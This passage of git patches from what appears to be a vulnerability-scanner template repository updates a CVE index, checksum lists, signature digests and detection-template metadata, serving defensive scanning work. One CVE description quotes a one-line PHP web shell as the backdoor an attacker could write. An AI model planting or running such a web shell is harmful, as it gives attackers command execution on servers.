Execution","Severity":"critical","Description":"FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39914.yaml"} @@ -2593,6 +2594,7 @@ {"ID":"CVE-2024-43917","Info":{"Name":"WordPress TI WooCommerce Wishlist Plugin \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43917.yaml"} {"ID":"CVE-2024-44000","Info":{"Name":"LiteSpeed Cache \u003c= 6.4.1 - Sensitive Information Exposure","Severity":"high","Description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-44000.yaml"} {"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"} +{"ID":"CVE-2024-44349","Info":{"Name":"AnteeoWMS \u003c v4.7.34 - SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44349.yaml"} {"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"} {"ID":"CVE-2024-44849","Info":{"Name":"Qualitor \u003c= 8.24 - Remote Code Execution","Severity":"critical","Description":"Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44849.yaml"} {"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"} @@ -2621,6 +2623,7 @@ {"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"} {"ID":"CVE-2024-5765","Info":{"Name":"WpStickyBar \u003c= 2.1.0 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5765.yaml"} {"ID":"CVE-2024-5827","Info":{"Name":"Vanna - SQL injection","Severity":"critical","Description":"Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `\u003c?php system($_GET[0]); ?\u003e`. This can lead to command execution or the creation of backdoors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5827.yaml"} +{"ID":"CVE-2024-5910","Info":{"Name":"Palo Alto Expedition - Admin Account Takeover","Severity":"critical","Description":"Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-5910.yaml"} {"ID":"CVE-2024-5932","Info":{"Name":"GiveWP - PHP Object Injection","Severity":"critical","Description":"The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5932.yaml"} {"ID":"CVE-2024-5936","Info":{"Name":"PrivateGPT \u003c 0.5.0 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in imartinez/privategpt version 0.5.0 due to improper handling of the 'file' parameter. This vulnerability allows attackers to redirect users to a URL specified by user-controlled input without proper validation or sanitization.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-5936.yaml"} {"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 7e287e0905..339c849c3a 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -223d0a251042512ea9601274d93c16f4 +97de10c8b3d0e3d24e2116fd3e68a356 From 01ec22b3726969eb4e8ab9c926fe8eaae505826b Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:39:28 +0000 Subject: [PATCH 091/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fe22cbe66b..34ed4edeab 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3793,7 +3793,7 @@ http/cves/2024/CVE-2024-38816.yaml:cf17b066ee186ae8cc82497e855712e3e6099857 http/cves/2024/CVE-2024-38856.yaml:90c859e0070d75465164d17caf1877524b5fe5bd http/cves/2024/CVE-2024-3922.yaml:c398c48b2696b36644cbd03105f97157a7b4b56c http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 -http/cves/2024/CVE-2024-39713.yaml:ec2d13209d3e935071a33360f8160b0595463e0a +http/cves/2024/CVE-2024-39713.yaml:278b1284a519e38ba63e7c0668a71c6f58f505f8 http/cves/2024/CVE-2024-39903.yaml:5f5e882db1afe8518a20e0edb57150abae54b674 http/cves/2024/CVE-2024-39907.yaml:c889ebd6022e4628332195c34c27b3deb48de3f5 http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf @@ -3814,6 +3814,7 @@ http/cves/2024/CVE-2024-4358.yaml:13a3a1250e1529ffc91043931bb2fc322998103f http/cves/2024/CVE-2024-43917.yaml:8feef564db794f7d2b90a4dd9aa7355697ea73aa http/cves/2024/CVE-2024-44000.yaml:da1f708dc158096fe8c628af6e36b51e21958ebb http/cves/2024/CVE-2024-4434.yaml:597591d430f802f75a17c2c04ae3aee6dcf392de +http/cves/2024/CVE-2024-44349.yaml:3b5ff977030324e84e13d6b0dc3e1fa6c3cf96d0 http/cves/2024/CVE-2024-4443.yaml:d23e057ea00b1051ec865516a6e246c71ddf420b http/cves/2024/CVE-2024-44849.yaml:9ca7cec952e5f2f8cbfa8e76fc365d8f03f84dac http/cves/2024/CVE-2024-45195.yaml:331e8730b2a9485b6a15057b67ce083f07c264a4 @@ -3842,6 +3843,7 @@ http/cves/2024/CVE-2024-5488.yaml:7d9ad7b220289088483a190e02e00798e0abe138 http/cves/2024/CVE-2024-5522.yaml:4ead21579625d4141e498a5837a73a31b2b99b25 http/cves/2024/CVE-2024-5765.yaml:487b5d32da8c2a9405653daab7369763cf83830e http/cves/2024/CVE-2024-5827.yaml:c8c798630092a11d237eba98e68105f7ddb8cc02 +http/cves/2024/CVE-2024-5910.yaml:2ef1522bb4bf053e364878b5b708dfde0d82b1b9 http/cves/2024/CVE-2024-5932.yaml:2c58bd22878f10edce95bb47ae01405f95382466 http/cves/2024/CVE-2024-5936.yaml:972f0727571f647e196b34f205727a958b1d6bee http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 @@ -4867,6 +4869,7 @@ http/exposed-panels/pacs-connexion-utilisateur.yaml:b76d85aa17275933bfee31bd63d6 http/exposed-panels/pagespeed-global-admin.yaml:96c612151fc6efa226c0ebbf6d440609dba39ff7 http/exposed-panels/pahtool-panel.yaml:4fbe84f98073f39239a3ef4b5c63000955a76f1b http/exposed-panels/pairdrop-panel.yaml:d31c93fc22266632f7deeabf02df44b3a9310ad4 +http/exposed-panels/paloalto-expedition-panel.yaml:0b3acdc1f8b93f785d78dee8cff8c5c2c0dee265 http/exposed-panels/panabit-panel.yaml:74efa0bec17bcad5eb702fadc11ccf8517d2e976 http/exposed-panels/pandora-fms-console.yaml:54f725d5b05ecaf74ebe03e10864483fd881dcda http/exposed-panels/papercut-ng-panel.yaml:775834276ae27186fae347b6d1700c02bc8fc0c7 @@ -5149,7 +5152,7 @@ http/exposed-panels/tup-openframe.yaml:8e6f0bcd762cdf9098621e8323e811b702424060 http/exposed-panels/turnkey-lamp-panel.yaml:8ec785a66d2050a19b465630ee89555e0d90798a http/exposed-panels/turnkey-openvpn.yaml:499a14d9a3eb9ca68ffcf856cd357b8a552bf30b http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 -http/exposed-panels/txadmin-panel.yaml:26e7c1e47496fb4e50979d085f78d643d91bfe49 +http/exposed-panels/txadmin-panel.yaml:60b85ab271dbecce4e378f4f14612cddc55edf3a http/exposed-panels/typo3-login.yaml:4e116dbb08d4fa3bc3aed57ad47e38728f911996 http/exposed-panels/uipath-orchestrator-panel.yaml:1e4773c92945e1f16a1f0d3fc7adb63f2eaa227b http/exposed-panels/umami-panel.yaml:f6551441a99dfa7eae097d14e7adc8122ce8cb8d @@ -7660,7 +7663,7 @@ http/technologies/microsoft-iis-8.yaml:10922e0c2d0a3fad8ff3ddbe9b55655de2e41fa1 http/technologies/microstrategy-detect.yaml:02eafd1137a771e38088c944bd4f1566fdd0cf48 http/technologies/microweber-detect.yaml:3ad6ea0402fc4fa813dea5d14501118f8a98de9c http/technologies/mikrotik-httpproxy.yaml:ea8a65313ce3bdb69e99487bea2d22ab7dcf9701 -http/technologies/mirth-connect-detect.yaml:2b70da91ae835466e0c1a3dee166289078f6ac7b +http/technologies/mirth-connect-detect.yaml:11ff8294640130dc19a703d2e474277e25004b83 http/technologies/moinmoin-detect.yaml:04db6100af908c8250ad5b8345437d55c1e1acc4 http/technologies/mojoportal-detect.yaml:db1e2829787dfe997e7e06790e3331d34105ab1c http/technologies/mongoose-server.yaml:79951e8efb17a5bf1f90dd8ef31964878e627f7d @@ -9463,7 +9466,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:03f5529c08ae1c2bae4304e6c0838b8d8a216f42 +templates-checksum.txt:c5f0636adc2618be4743fa7647b940760477cf0a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 90fa5c6cb9bca24efd6f70a871828d3d524485fe Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:39:48 +0400 Subject: [PATCH 092/218] Update accellion-detect.yaml --- http/technologies/accellion-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/accellion-detect.yaml b/http/technologies/accellion-detect.yaml index 869d61a4fd..78bbcc9c06 100644 --- a/http/technologies/accellion-detect.yaml +++ b/http/technologies/accellion-detect.yaml @@ -1,7 +1,7 @@ id: accellion-detect info: - name: Accellion Detection + name: Accellion - Detect author: rxerium severity: info description: | From b2588ea6a5e51831d19b6630ae6ad7abbb3cf921 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:40:21 +0400 Subject: [PATCH 093/218] Update oracle-fusion-detect.yaml --- http/technologies/oracle-fusion-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/technologies/oracle-fusion-detect.yaml b/http/technologies/oracle-fusion-detect.yaml index 8d4a0ae6b1..859145955a 100644 --- a/http/technologies/oracle-fusion-detect.yaml +++ b/http/technologies/oracle-fusion-detect.yaml @@ -1,7 +1,7 @@ id: oracle-fusion-detect info: - name: Oracle Fusion Middleware - Detection + name: Oracle Fusion Middleware - Detect author: rxerium severity: info description: | @@ -22,7 +22,7 @@ http: - type: word part: body words: - - "Welcome to Oracle Fusion Middleware" + - "Welcome to Oracle Fusion Middleware" - type: status status: From 330257279226fe611b5927042664a0278735e0c7 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:41:02 +0000 Subject: [PATCH 094/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2024/CVE-2024-39713.yaml | 3 +-- http/cves/2024/CVE-2024-44349.yaml | 2 ++ http/cves/2024/CVE-2024-5910.yaml | 2 ++ http/exposed-panels/paloalto-expedition-panel.yaml | 2 ++ 4 files changed, 7 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-39713.yaml b/http/cves/2024/CVE-2024-39713.yaml index b8bf734578..b516f6c2ef 100644 --- a/http/cves/2024/CVE-2024-39713.yaml +++ b/http/cves/2024/CVE-2024-39713.yaml @@ -58,5 +58,4 @@ http: part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - -# digest: 4b0a00483046022100d4963be63f618917743d9135979d4e5cbc0616a4a625d65c65196409b30c779c022100e52e873c1b6c9ef9f95b74dd18262abbaace038bd6efcc0748d6907b6f6ae91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1eb24244de8eab33c5bdf64e1b64fbb73f9677cadb7ce7ed7f9a0e316366d4802210091561db9f520bb98f06c8c192535d56115d598d5aba8036cfc05c3390521ab11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-44349.yaml b/http/cves/2024/CVE-2024-44349.yaml index 22953fdc18..22401fb6da 100644 --- a/http/cves/2024/CVE-2024-44349.yaml +++ b/http/cves/2024/CVE-2024-44349.yaml @@ -67,3 +67,5 @@ http: part: body words: - 'Conversion failed when converting the nvarchar value 'Microsoft SQL Server' + +# digest: 490a004630440220494cf226a8ede120de5770ad2cb5120ab74b57ed72e5b5156ec35b505221d82502205a72bd99bc311854a67d74828dc4230a79e3484314150c73e525bd55d716ec7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml index adaf799ab6..043c96a2da 100644 --- a/http/cves/2024/CVE-2024-5910.yaml +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -40,3 +40,5 @@ http: - type: status status: - 200 + +# digest: 490a00463044022071a1326369af86704b22d29964826646297ccc20788847b1d4ad87efa0b2b1a2022048bf1c997f47900620775ca83cdf9f7655ff7c13fba970af65d01b30eb099141:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/paloalto-expedition-panel.yaml b/http/exposed-panels/paloalto-expedition-panel.yaml index e138d38677..2239d5963a 100644 --- a/http/exposed-panels/paloalto-expedition-panel.yaml +++ b/http/exposed-panels/paloalto-expedition-panel.yaml @@ -32,3 +32,5 @@ http: - type: status status: - 200 + +# digest: 4a0a004730450220639bf929eb096fc1fdcb510e30759eb3554b84d5b8122224a9e744381001a75f022100c9bcb971a1a1541558000f2efebac25102767b75e342e8e9a32f20d1498e02f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 07d8a3e956c53e8939576c807d8508d9bf180bfa Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:42:12 +0400 Subject: [PATCH 095/218] Update veritas-netbackup-panel.yaml --- http/exposed-panels/veritas-netbackup-panel.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/veritas-netbackup-panel.yaml b/http/exposed-panels/veritas-netbackup-panel.yaml index ae41a75aee..b90bf8aff9 100644 --- a/http/exposed-panels/veritas-netbackup-panel.yaml +++ b/http/exposed-panels/veritas-netbackup-panel.yaml @@ -1,19 +1,18 @@ id: veritas-netbackup-panel info: - name: Veritas NetBackup OpsCenter Analytics Login - Panel + name: Veritas NetBackup OpsCenter Analytics Login - Detect author: rxerium severity: info description: | A Veritas NetBackup OpsCenter Analytics page was detected. reference: - https://www.veritas.com/ - classification: - cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"Veritas NetBackup OpsCenter Analytics" - tags: panel,veritas,netbackup,opscenter,analytics,login + tags: panel,veritas,netbackup,opscenter,login,detect http: - method: GET @@ -25,7 +24,7 @@ http: - type: word part: body words: - - '<title>Veritas NetBackup OpsCenter Analytics' + - 'Veritas NetBackup OpsCenter Analytics' - type: status status: From 0d74b7bda8c1a6b551bd82a14ce5c384b8b1f6fc Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:45:54 +0000 Subject: [PATCH 096/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 242a029944..e846055ba8 100644 --- a/.new-additions +++ b/.new-additions @@ -1,7 +1,9 @@ http/cves/2024/CVE-2024-39713.yaml +http/cves/2024/CVE-2024-44349.yaml http/cves/2024/CVE-2024-5910.yaml http/exposed-panels/paloalto-expedition-panel.yaml http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml +http/exposed-panels/vmware-aria-panel.yaml http/technologies/mirth-connect-detect.yaml http/technologies/wordpress/plugins/burst-statistics.yaml From dc2015c3c2de0e0e4829e058d1420e57321b99b3 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:46:05 +0000 Subject: [PATCH 097/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 34ed4edeab..e2996370f0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -418,8 +418,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:28921c9a16f0cf8514ecc10e01ad14178430d84b -cves.json-checksum.txt:4155e922825f784b04fc9cee4b8dea2c807a3f3a +cves.json:a192b85fc80dc6835f45f27564e5f47c9858b351 +cves.json-checksum.txt:1e98d5ecc15aadd66ec27706442d35f880250ef2 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3793,7 +3793,7 @@ http/cves/2024/CVE-2024-38816.yaml:cf17b066ee186ae8cc82497e855712e3e6099857 http/cves/2024/CVE-2024-38856.yaml:90c859e0070d75465164d17caf1877524b5fe5bd http/cves/2024/CVE-2024-3922.yaml:c398c48b2696b36644cbd03105f97157a7b4b56c http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 -http/cves/2024/CVE-2024-39713.yaml:278b1284a519e38ba63e7c0668a71c6f58f505f8 +http/cves/2024/CVE-2024-39713.yaml:e66acb00da95626ead0ac0f700645e624edfe26b http/cves/2024/CVE-2024-39903.yaml:5f5e882db1afe8518a20e0edb57150abae54b674 http/cves/2024/CVE-2024-39907.yaml:c889ebd6022e4628332195c34c27b3deb48de3f5 http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf @@ -3814,7 +3814,7 @@ http/cves/2024/CVE-2024-4358.yaml:13a3a1250e1529ffc91043931bb2fc322998103f http/cves/2024/CVE-2024-43917.yaml:8feef564db794f7d2b90a4dd9aa7355697ea73aa http/cves/2024/CVE-2024-44000.yaml:da1f708dc158096fe8c628af6e36b51e21958ebb http/cves/2024/CVE-2024-4434.yaml:597591d430f802f75a17c2c04ae3aee6dcf392de -http/cves/2024/CVE-2024-44349.yaml:3b5ff977030324e84e13d6b0dc3e1fa6c3cf96d0 +http/cves/2024/CVE-2024-44349.yaml:db54b5e7a9ed248fdc9bf0c763096ebf0b10c10e http/cves/2024/CVE-2024-4443.yaml:d23e057ea00b1051ec865516a6e246c71ddf420b http/cves/2024/CVE-2024-44849.yaml:9ca7cec952e5f2f8cbfa8e76fc365d8f03f84dac http/cves/2024/CVE-2024-45195.yaml:331e8730b2a9485b6a15057b67ce083f07c264a4 @@ -3843,7 +3843,7 @@ http/cves/2024/CVE-2024-5488.yaml:7d9ad7b220289088483a190e02e00798e0abe138 http/cves/2024/CVE-2024-5522.yaml:4ead21579625d4141e498a5837a73a31b2b99b25 http/cves/2024/CVE-2024-5765.yaml:487b5d32da8c2a9405653daab7369763cf83830e http/cves/2024/CVE-2024-5827.yaml:c8c798630092a11d237eba98e68105f7ddb8cc02 -http/cves/2024/CVE-2024-5910.yaml:2ef1522bb4bf053e364878b5b708dfde0d82b1b9 +http/cves/2024/CVE-2024-5910.yaml:57d778e9f8715b05b670f6d36aefb752849f1cd8 http/cves/2024/CVE-2024-5932.yaml:2c58bd22878f10edce95bb47ae01405f95382466 http/cves/2024/CVE-2024-5936.yaml:972f0727571f647e196b34f205727a958b1d6bee http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 @@ -4869,7 +4869,7 @@ http/exposed-panels/pacs-connexion-utilisateur.yaml:b76d85aa17275933bfee31bd63d6 http/exposed-panels/pagespeed-global-admin.yaml:96c612151fc6efa226c0ebbf6d440609dba39ff7 http/exposed-panels/pahtool-panel.yaml:4fbe84f98073f39239a3ef4b5c63000955a76f1b http/exposed-panels/pairdrop-panel.yaml:d31c93fc22266632f7deeabf02df44b3a9310ad4 -http/exposed-panels/paloalto-expedition-panel.yaml:0b3acdc1f8b93f785d78dee8cff8c5c2c0dee265 +http/exposed-panels/paloalto-expedition-panel.yaml:153ed7214b6e85208b1e192651210723a004e1b3 http/exposed-panels/panabit-panel.yaml:74efa0bec17bcad5eb702fadc11ccf8517d2e976 http/exposed-panels/pandora-fms-console.yaml:54f725d5b05ecaf74ebe03e10864483fd881dcda http/exposed-panels/papercut-ng-panel.yaml:775834276ae27186fae347b6d1700c02bc8fc0c7 @@ -5185,6 +5185,7 @@ http/exposed-panels/vinchin-panel.yaml:f4b751e19d3f8b5981c1b0ef89264e5ecadb270d http/exposed-panels/virtua-software-panel.yaml:bc0229998feb2dad214b820e76c0e21fa597f3a9 http/exposed-panels/virtual-ema-detect.yaml:02b9fdcff2c9183effa7675ef1e9b18df5c9e918 http/exposed-panels/vistaweb-panel.yaml:2da7f46b0a5a4865a3fb2c9019c3006ad478e70b +http/exposed-panels/vmware-aria-panel.yaml:c732cdc26055517b6db77c45e6d4dae47223c38b http/exposed-panels/vmware-carbon-black-edr.yaml:c245a504fbf899a1727ed03088d0576cf72325db http/exposed-panels/vmware-cloud-availability.yaml:fce792d6709e97901eebc7fb2c99d6cda2bcc1e0 http/exposed-panels/vmware-cloud-director.yaml:57d1162f8d7d561f47e734ff576bbc0b69d6f76f @@ -9466,7 +9467,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c5f0636adc2618be4743fa7647b940760477cf0a +templates-checksum.txt:3d37c100d04a4f818d698f72f8bc953188a36426 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fccf80e65ae1ea958e9d3527fd41aa9e86dcdd68 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:47:12 +0000 Subject: [PATCH 098/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e846055ba8..142f9351e7 100644 --- a/.new-additions +++ b/.new-additions @@ -5,5 +5,6 @@ http/exposed-panels/paloalto-expedition-panel.yaml http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml http/exposed-panels/vmware-aria-panel.yaml +http/technologies/accellion-detect.yaml http/technologies/mirth-connect-detect.yaml http/technologies/wordpress/plugins/burst-statistics.yaml From 2b8b5bf5df4361a8a5968db36d359951aeca62d0 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:47:25 +0000 Subject: [PATCH 099/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 142f9351e7..99d363acbc 100644 --- a/.new-additions +++ b/.new-additions @@ -7,4 +7,5 @@ http/exposed-panels/txadmin-panel.yaml http/exposed-panels/vmware-aria-panel.yaml http/technologies/accellion-detect.yaml http/technologies/mirth-connect-detect.yaml +http/technologies/oracle-fusion-detect.yaml http/technologies/wordpress/plugins/burst-statistics.yaml From 100b6793f1cae2a163d0dbef2cff37478b5af203 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:47:34 +0000 Subject: [PATCH 100/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 99d363acbc..df3a909fc4 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ 